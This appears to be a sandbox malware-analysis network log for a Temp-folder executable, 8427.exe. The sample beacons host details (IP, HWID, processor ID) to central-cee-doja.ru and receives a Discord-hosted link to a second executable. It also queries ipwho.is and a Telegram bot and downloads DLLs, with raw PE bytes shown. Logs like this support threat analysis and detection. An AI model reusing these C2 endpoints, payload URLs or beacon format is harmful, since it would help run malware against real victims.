2023-11-18 09:03:11 UTC	10668	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GS%2FMeHb2hxcODEhY0nGN3HvkWXKF9qaWvdLmk2F0wvUY0H0tNTTstzcwEeeRUen4nGOgkRWzVz%2BTMggwGBOWASllzrOfted28Hy2wHiUw9COW4FV3gC00vo2ZrmGsjT8Gaje%2BF%2Fa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09efd96b086d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:11 UTC	10668	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:11 UTC	10668	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49808	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:11 UTC	10668	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:11 UTC	10668	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GS%2FMeHb2hxcODEhY0nGN3HvkWXKF9qaWvdLmk2F0wvUY0H0tNTTstzcwEeeRUen4nGOgkRWzVz%2BTMggwGBOWASllzrOfted28Hy2wHiUw9COW4FV3gC00vo2ZrmGsjT8Gaje%2BF%2Fa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09efd96b086d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:11 UTC	10668	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:11 UTC	10668	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49811	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:12 UTC	10668	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:13 UTC	10669	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fdp1VzG%2FT1V2Fx8c96nBEYSDtWNkwRSMIiFUlbjaMUkkLvJqUtTR%2FM%2F7LFoPBKHqKdyDH%2B9JG0MIciDzSedNcdY5YGXk%2BZ2vxYojN58Udto%2BvfITiel5sUkbjJvX1chthnrSA6D3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09f7086930d7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:13 UTC	10669	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:13 UTC	10669	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	104.21.89.193	443	192.168.2.4	49811	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:12 UTC	10668	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:13 UTC	10669	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fdp1VzG%2FT1V2Fx8c96nBEYSDtWNkwRSMIiFUlbjaMUkkLvJqUtTR%2FM%2F7LFoPBKHqKdyDH%2B9JG0MIciDzSedNcdY5YGXk%2BZ2vxYojN58Udto%2BvfITiel5sUkbjJvX1chthnrSA6D3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09f7086930d7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:13 UTC	10669	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:13 UTC	10669	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49810	149.154.167.99	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:12 UTC	10669	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
2023-11-18 09:03:13 UTC	10669	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:03:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10856 Connection: close Set-Cookie: stel_ssid=2d079445640790779e_4038754964735773825; expires=Sun, 19 Nov 2023 09:03:12 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-11-18 09:03:13 UTC	10670	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 69 6e 6f 73 68 69 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cinoshibot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	149.154.167.99	443	192.168.2.4	49810	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:12 UTC	10669	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
2023-11-18 09:03:13 UTC	10669	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:03:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10856 Connection: close Set-Cookie: stel_ssid=2d079445640790779e_4038754964735773825; expires=Sun, 19 Nov 2023 09:03:12 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-11-18 09:03:13 UTC	10670	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 69 6e 6f 73 68 69 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cinoshibot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	104.21.89.193	443	192.168.2.4	49812	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:13 UTC	10680	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:14 UTC	10682	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F%2Ft7MBaRp%2BoymB55lEGdHBAZBoFoStmf291kyi9u0II1UX8W0VxTqjQX6QHPPufTCcCL1V1SSocZVrbEWLHsJL3u7BW%2Bt3b4uHgEKHMioBSMjhwzOTj4CpR3%2BSa05gjp%2FkjrC5K6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a002de5c648-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:14 UTC	10682	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:14 UTC	10682	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49812	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:13 UTC	10680	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:14 UTC	10682	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F%2Ft7MBaRp%2BoymB55lEGdHBAZBoFoStmf291kyi9u0II1UX8W0VxTqjQX6QHPPufTCcCL1V1SSocZVrbEWLHsJL3u7BW%2Bt3b4uHgEKHMioBSMjhwzOTj4CpR3%2BSa05gjp%2FkjrC5K6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a002de5c648-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:14 UTC	10682	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:14 UTC	10682	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	147.135.36.89	443	192.168.2.4	49813	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:13 UTC	10681	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2023-11-18 09:03:14 UTC	10681	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2023-11-18 09:03:14 UTC	10681	IN	Data Raw: 33 61 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 57 61 Data Ascii: 3a3<?xml version="1.0" encoding="UTF-8"?><query><ip>156.146.49.168</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Wa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49813	147.135.36.89	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:13 UTC	10681	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2023-11-18 09:03:14 UTC	10681	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2023-11-18 09:03:14 UTC	10681	IN	Data Raw: 33 61 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 57 61 Data Ascii: 3a3<?xml version="1.0" encoding="UTF-8"?><query><ip>156.146.49.168</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Wa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	104.21.89.193	443	192.168.2.4	49814	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:14 UTC	10682	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:15 UTC	10682	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6y2QP82lXKnxkp862fMi9aJ6yGDV2fPlR2iPYqOW0Har87AwuztDmHTW9FHKa1czGS%2F11j%2FUgBEQUUVG5B5QH0liv0LPRtb3sx%2BZGKKsPhIbtWODawAJyNpq98liiP%2Fww7pxJ%2F8y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a06bf3b283a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:15 UTC	10683	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:15 UTC	10683	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49814	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:14 UTC	10682	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:15 UTC	10682	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6y2QP82lXKnxkp862fMi9aJ6yGDV2fPlR2iPYqOW0Har87AwuztDmHTW9FHKa1czGS%2F11j%2FUgBEQUUVG5B5QH0liv0LPRtb3sx%2BZGKKsPhIbtWODawAJyNpq98liiP%2Fww7pxJ%2F8y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a06bf3b283a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:15 UTC	10683	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:15 UTC	10683	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	104.21.89.193	443	192.168.2.4	49815	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:15 UTC	10683	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:16 UTC	10684	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BCJx%2B%2Fio7uqamGwY%2FXXW%2BRjeJBDcdf3mN5tTl0jhSzgUUNA4RSfT2MzSQuC6XdY6zBY29SCl5nbmK4HuVnElny6Dpf6RbwBOd%2Bynr%2Fz4Pb8MF0ibg4Nd20nlArLQmxpUtQgvs0h0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a0ded50ec90-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49815	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:15 UTC	10683	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:16 UTC	10684	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BCJx%2B%2Fio7uqamGwY%2FXXW%2BRjeJBDcdf3mN5tTl0jhSzgUUNA4RSfT2MzSQuC6XdY6zBY29SCl5nbmK4HuVnElny6Dpf6RbwBOd%2Bynr%2Fz4Pb8MF0ibg4Nd20nlArLQmxpUtQgvs0h0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a0ded50ec90-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49747	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:36 UTC	596	OUT	GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:37 UTC	596	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:37 GMT Content-Type: application/x-msdos-program Content-Length: 201520 Connection: close Last-Modified: Tue, 02 Nov 2021 17:45:14 GMT ETag: "31330-5cfd1db111e80" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7RkxbinR9HD0sZXkUvyXWRnVDIzuXB0lT64wEI3PoUrlRhoqvIuoGrexip5yKwTcttYDc5u59S6V6hThSWtTBS52zrF1Bpir6dP4VlHye0jUEHL%2B1lwerPM84uczxC8R6lVOdmzY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0918ceda682a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:37 UTC	596	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 c8 02 00 00 08 00 00 00 00 00 00 d6 e6 02 00 00 20 00 00 00 00 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 c7 99 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0 @`
2023-11-18 09:02:37 UTC	597	IN	Data Raw: 09 6f 29 00 00 0a 74 1b 00 00 01 08 2c 04 16 0c 2b 0c 06 72 39 00 00 70 6f 22 00 00 0a 26 25 6f 2a 00 00 0a 07 6f 25 00 00 0a 06 72 3f 00 00 70 6f 22 00 00 0a 26 6f 2b 00 00 0a 07 6f 25 00 00 0a 09 6f 13 00 00 0a 2d b7 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 2c 2a 07 16 8c a3 00 00 01 1f 0b 6f 73 01 00 06 13 04 06 11 04 6f 2c 00 00 0a 6f 22 00 00 0a 26 06 72 47 00 00 70 6f 22 00 00 0a 26 06 6f 26 00 00 0a 26 06 72 51 00 00 70 6f 22 00 00 0a 26 02 6f 2d 00 00 0a 07 6f 25 00 00 0a 06 72 5f 00 00 70 6f 2e 00 00 0a 26 06 02 07 02 6f 21 00 00 0a 16 28 07 00 00 06 03 07 6f 70 01 00 06 51 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 5f 00 4d ac 00 0a 00 00 00 00 13 30 05 00 6e 00 00 00 02 00 00 11 7e 01 00 00 04 73 20 00 00 0a 25 02 16 72 63 00 00 70 73 6f 01 00 06 0a Data Ascii: o)t,+r9po"&%oo%r?po"&o+o%o-,o,oso,o"&rGpo"&o&&rQpo"&o-o%r_po.&o!(opQo/*_M0n~s %rcpso
